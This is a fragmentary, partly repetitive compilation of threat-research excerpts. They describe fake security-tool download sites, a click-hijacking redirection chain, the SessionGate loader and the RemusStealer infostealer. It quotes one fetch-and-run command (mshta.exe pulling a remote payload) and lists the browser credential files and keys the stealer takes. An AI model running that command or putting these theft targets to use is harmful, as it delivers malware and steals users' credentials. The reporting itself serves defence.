RemusStealer

The JavaScript loaded by these pages listens for the user’s first interaction and intercepts it before normal navigation can proceed. On Chrome it captures a mousedown event; on Firefox it uses a click event. It then generates a TDS runtime URL, redirects the user silently, and cancels the original navigation entirely.

Hackers are creating convincing fake websites that impersonate popular security tools to trick users into downloading malware.

The page that imitates a Cloudflare verification screen and instructs the user to run: C:\Windows\SysWOW64\mshta.exe https://185.0xA1.0xFB[.]58/navy.7z

The attack chain uses CloudFront-hosted JavaScript for browser fingerprinting, click tracking, and traffic routing, enabling stealthy, interaction-based redirection... The payload employs a heavily obfuscated Go loader...

These pages load a CloudFront-hosted JavaScript staging layer that converts a click on a “download” button/link into a handoff to a Traffic Distribution System (TDS). The TDS enforces strict gating: first-visit state, mandatory click confirmation, anti-bot/anti-analysis logic, VPN/datacenter filtering, and frequency capping.

SessionGate — A previously unknown multi-stage loader with heavy obfuscation and extensive anti-analysis mechanisms... Because of the obfuscation techniques in use, including injected junk code, opaque predicates, and string encryption, the resulting functions become extremely bloated.

Check Point Research investigated a large-scale operation that impersonates open-source and freeware projects to capture search traffic, including lookalikes for researcher and security tooling such as Ghidra, dnSpy, and SpiderFoot.

These pages load a CloudFront-hosted JavaScript staging layer that converts a click on a “download” button/link into a handoff to a Traffic Distribution System (TDS). The TDS enforces strict gating: first-visit state, mandatory click confirmation, anti-bot/anti-analysis logic, VPN/datacenter filtering, and frequency capping.

The modules are not written to disk: they are loaded via in-memory PE manual mapping (often referred to as reflective / manual-map loading), and execution is transferred through exported functions.

Browser data theft: Chromium family : History, Login Data, Login Data For Account, Network\Cookies, Web Data Firefox/NSS profiles : key4.db, cert9.db, cookies.sqlite, logins.json...

Browser data theft: Chromium family : ... Login Data ... Firefox/NSS profiles : ... logins.json ... Chromium key material : extracts the master key from Local State via DPAPI (CryptUnprotectData)

Browser data theft: Chromium family : History, Login Data, Login Data For Account, Network\Cookies, Web Data ... Firefox/NSS profiles : ... logins.json

RemusStealer is a newly emerged infostealer targeting data from more than 20 browsers, including cryptocurrency wallets, password managers, and two-factor authentication tools.

Registry reconnaissance : server-controlled queries of arbitrary path/value pairs, with HKCU-relative support and WOW64 view retry logic.

data contains: path, mask, depth, size, link ... Expands %ENV% paths, traverses directories with filters/limits, collects matching file contents, packages results, and uploads them to C2.

The agent executes tasks in a loop ... File-system search + exfiltration ... Browser data theft ... Registry reconnaissance ... Clipboard theft ... Screenshot capture

Screenshot capture : supported and exfiltrated as Screenshot.bmp when enabled by an internal flag

Clipboard theft : captures CF_UNICODETEXT, exfiltrated as Clipboard.txt ... At a high level, the final payload is a clipboard-hijacking crypto clipper: it continuously monitors the clipboard for cryptocurrency wallet strings ... replaces the copied address with one of multiple attacker-controlled wallet addresses.

...retrieves its command-and-control infrastructure through an Ethereum-based dead drop resolver...

The stealer polls the C2 using HTTP POST requests ... The malware uses HTTPS to communicate with the resolved C2 server. In the analyzed build, the observed logic includes periodic refresh check-ins

...retrieves its command-and-control infrastructure through an Ethereum-based dead drop resolver, demonstrating advanced evasion and resilient C2 techniques...

These pages load a CloudFront-hosted JavaScript staging layer that converts a click on a “download” button/link into a handoff to a Traffic Distribution System (TDS). The TDS enforces strict gating: first-visit state, mandatory click confirmation, anti-bot/anti-analysis logic, VPN/datacenter filtering, and frequency capping.